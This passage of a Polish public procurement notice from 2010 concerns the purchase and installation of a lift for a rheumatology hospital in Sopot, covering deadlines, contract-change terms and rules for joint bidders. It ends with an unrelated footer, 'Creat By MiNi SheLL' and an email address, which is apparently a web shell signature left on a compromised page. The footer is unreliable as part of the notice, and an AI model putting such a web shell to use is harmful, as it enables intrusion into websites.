<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Niedopuszczalne pod rygorem nieważności są istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że nastąpią następujące warunki zmiany umowy:
- w przypadku uniemożliwienia rozpoczęcia realizacji umowy lub zaistnienia przerw w jej wykonaniu, a także opóźnienia prac - z przyczyn nie leżących po stronie Wykonawcy, ostateczny termin wykonania umowy może ulec przesunięciu o okres wynikający z zaistniałych okoliczności. O każdej takiej sytuacji Wykonawca winien niezwłocznie zawiadomić Zamawiającego, wraz z podaniem przyczyn przerwy i opóźnienia, który w razie uznania występowania przesłanek do przesunięcia terminu wykonania prac, może podpisać aneks przedłużający ostateczny termin wykonania, 
- nastąpi zmiana materiałów lub urządzeń przewidzianych w dokumentacji projektowej lub ofercie przetargowej Wykonawcy, wynikająca z zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy, jeżeli zmiana ta nie doprowadzi do obniżenia standardu dostawy i instalacji i mieści się w cenie oferty,
- wystąpią zmiany w nazwach lub adresach stron, zmiany związane z przekształceniem podmiotowym stron;
- zmiany umowy są konieczne na skutek działania organów administracji lub instytucji upoważnionych do wydania decyzji albo innych aktów władczych lub nadzorczych, związanych z realizacją przedmiotu umowy;
- nastąpi zmiana obowiązujących przepisów prawa związanych z przedmiotowym zamówieniem,
- zaistnieje siła wyższa uniemożliwiająca okresowe wykonywanie przedmiotu umowy,
- wystąpią okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w związku z nimi wystąpi konieczność wprowadzenia zmian do umowy, zaś zmiany te są korzystne dla Zamawiającego i zostaną zaakceptowane przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wzr.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Zespół Reumatologiczny
im. Jadwigi Titz - Kosko
ul. Grunwaldzka 1-3
81-759 Sopot
Sekretariat, II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2010 godzina 10:00, miejsce: Wojewódzki Zespół Reumatologiczny
im. Jadwigi Titz - Kosko
ul. Grunwaldzka 1-3
81-759 Sopot
Sekretariat, II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	W związku z wykonywaniem robót budowlanych rozbudowy szybu dźwigowego Zamawiający wymaga, aby dźwig z oprzyrządowaniem dostępny był dla Zamawiającego do ewentualnej instalacji począwszy od dnia 1 października 2010 r. 
	
2.	Instalacja dźwigu nastąpi w zależności od stopnia zaawansowania robót budowlanych, przy czym począwszy od przewidywanego okresu, tj. od dnia 1 października 2010 r. Zamawiający wezwie Wykonawcę do dostawy oraz rozpoczęcia instalacji dźwigu, w terminie do 7 dni od daty wezwania. 

3.	Ostateczny przewidywany termin odbioru całości przedmiotu zamówienia publicznego obejmującego dostawę, instalację oraz rozruch i odbiór techniczny dźwigu: do dnia 15 listopada 2010 r. 
Główne warunki finansowania i płatności : 
Płatności z tytułu wykonanej usługi zostanie dokonana w terminie 30 dni od daty podpisania protokołu końcowego bez zastrzeżeń i doręczenia Zamawiającemu faktury .

3. Forma prawna, jaką musi przyjąć grupa wykonawców, której zostanie udzielone zamówienie : 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - Wykonawcy są zobowiązani dołączyć dodatkowo : 
- listę Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia oraz 
- dokument ustanawiający pełnomocnika do reprezentowania ich w niniejszym postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia .    
Pełnomocnictwo musi być złożone w formie oryginału, poświadczonej notarialnie kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu. Treść pełnomocnictwa musi jednoznacznie określać czynności, do wykonywania których pełnomocnik jest upoważniony. 
Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana - Zamawiający zażąda -przed podpisaniem umowy - umowy regulującej współpracę tych podmiotów. Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność  za niewykonanie lub nienależyte wykonanie zobowiązania .
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - każdy z Wykonawców poświadcza także własne dokumenty.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - Wykonawcy są zobowiązani dołączyć dodatkowo dokument ustanawiający pełnomocnika do reprezentowania ich w niniejszym postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia.
    
Dokument pełnomocnictwa pełnomocnika występującego w imieniu podmiotów ubiegających się o wspólne wykonanie zamówienia w przypadku składania oferty wspólnej musi być złożony w formie oryginału lub poświadczonej notarialnie kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu. Treść pełnomocnictwa musi jednoznacznie określać czynności, do wykonywania których pełnomocnik jest upoważniony. 

Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania wynikającego ze złożonej oferty.

UWAGA: jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana - Zamawiający zażąda - przed podpisaniem umowy - umowy regulującej współpracę tych podmiotów. 

Każdy z Wykonawców jest zobowiązany złożyć dokumenty wymagane przez Zamawiającego w jednej z następujących form (nie dotyczy pełnomocnictw):
- oryginały,
- kserokopie poświadczone za zgodność z oryginałem przez Wykonawcę.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - kopie dokumentów dotyczących odpowiednio Wykonawcy są poświadczone za zgodność z oryginałem przez Wykonawcę
1. Rodzaj procedury: 
otwarta
2. Kryteria udzielenie zamówienia : 
a)	Najniższa cena - 100%
3.	Nie będzie wykorzystana aukcja elektroniczna. 
4.	Dynamiczny system zakupu nie ma zastosowania.
5.	Umowa ramowa nie ma zastosowania.
6.	Formalności po wyborze oferty:
6.1. Zamawiający po wyborze oferty zawiadomi pisemnie Wykonawcę, którego oferta zostanie wybrana o dacie i miejscu zawarcia Umowy. Przed podpisaniem umowy Wykonawca winien złożyć zabezpieczenie.
6.2. Umowa z Wykonawcą, którego oferta zostanie uznana za najkorzystniejszą zostanie zawarta w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli zawiadomienie to zostało przesłane w sposób określony w art. 27 ust. 2 ustawy Prawo zamówień publicznych, albo 10 dni - jeżeli zostało przesłane w inny sposób, z zastrzeżeniem art. 94 ust. 2 ustawy Prawo zamówień publicznych (Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem wskazanych terminów, jeżeli w postępowaniu o udzielenie zamówienia w przypadku trybu przetargu nieograniczonego złożono tylko jedną ofertę, lub w postępowaniu o udzielenie zamówienia nie odrzucono żadnej oferty oraz nie wykluczono żadnego wykonawcy).
6.3. Niedopuszczalne pod rygorem nieważności są istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że nastąpią następujące warunki zmiany umowy:
- w przypadku uniemożliwienia rozpoczęcia realizacji umowy lub zaistnienia przerw w jej wykonaniu, a także opóźnienia prac - z przyczyn nie leżących po stronie Wykonawcy, ostateczny termin wykonania umowy może ulec przesunięciu o okres wynikający z zaistniałych okoliczności. O każdej takiej sytuacji Wykonawca winien niezwłocznie zawiadomić Zamawiającego, wraz z podaniem przyczyn przerwy i opóźnienia, który w razie uznania występowania przesłanek do przesunięcia terminu wykonania prac, może podpisać aneks przedłużający ostateczny termin wykonania, 
- nastąpi zmiana materiałów lub urządzeń przewidzianych w dokumentacji projektowej lub ofercie przetargowej Wykonawcy, wynikająca z zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy, jeżeli zmiana ta nie doprowadzi do obniżenia standardu dostawy i instalacji i mieści się w cenie oferty,
- wystąpią zmiany w nazwach lub adresach stron, zmiany związane z przekształceniem podmiotowym stron;
- zmiany umowy są konieczne na skutek działania organów administracji lub instytucji upoważnionych do wydania decyzji albo innych aktów władczych lub nadzorczych, związanych z realizacją przedmiotu umowy;
- nastąpi zmiana obowiązujących przepisów prawa związanych z przedmiotowym zamówieniem,
- zaistnieje siła wyższa uniemożliwiająca okresowe wykonywanie przedmiotu umowy,
- wystąpią okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w związku z nimi wystąpi konieczność wprowadzenia zmian do umowy, zaś zmiany te są korzystne dla Zamawiającego i zostaną zaakceptowane przez Wykonawcę.
a) numer referencyjny nadany sprawie przez podmiot zamawiający : N/10/10
b) brak poprzednich publikacji dotyczących tego samego ogłoszenia
c) warunki uzyskania specyfikacji: do dnia 21 czerwca 2010 roku, Formularz Specyfikacji  Istotnych Warunków Zamówienia dotyczącej niniejszego postępowania można odebrać osobiście, na stronie internetowej www.wzr.com.pl lub za zaliczeniem pocztowym w:
Wojewódzki Zespół Reumatologiczny
im. Jadwigi Titz - Kosko
ul. Grunwaldzka 1-3
81-759 Sopot
Sekretariat, II piętro 
cena formularza Specyfikacji Istotnych Warunków Zamówienia - 10 zł (+ VAT ) 
d) MIEJSCE I TERMIN SKŁADANIA OFERT.
Ofertę należy doręczyć do dnia : 22 czerwca 2010 roku o godz. 10.00 do: 
Wojewódzki Zespół Reumatologiczny im. Jadwigi Titz - Kosko                                  
ul. Grunwaldzka 1-3
81-759 Sopot                                                                  
Sekretariat, II piętro
e) MIEJSCE I TERMIN OTWARCIA OFERT.
Komisyjne otwarcie ofert nastąpi w trakcie posiedzenia Komisji Przetargowej, które odbędzie się w  dniu: 
22 czerwca 2010 roku o godz. 11.00 w:      
Wojewódzki Zespół Reumatologiczny im. Jadwigi Titz - Kosko                                  
ul. Grunwaldzka 1-3
81-759 Sopot                                                                      
Dział Zamówień Publicznych, I piętro, pok. nr 7B
f) język , w którym można sporządzać oferty : PL
g) minimalny okres związania ofertą : 30 dni od dnia składania ofert.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com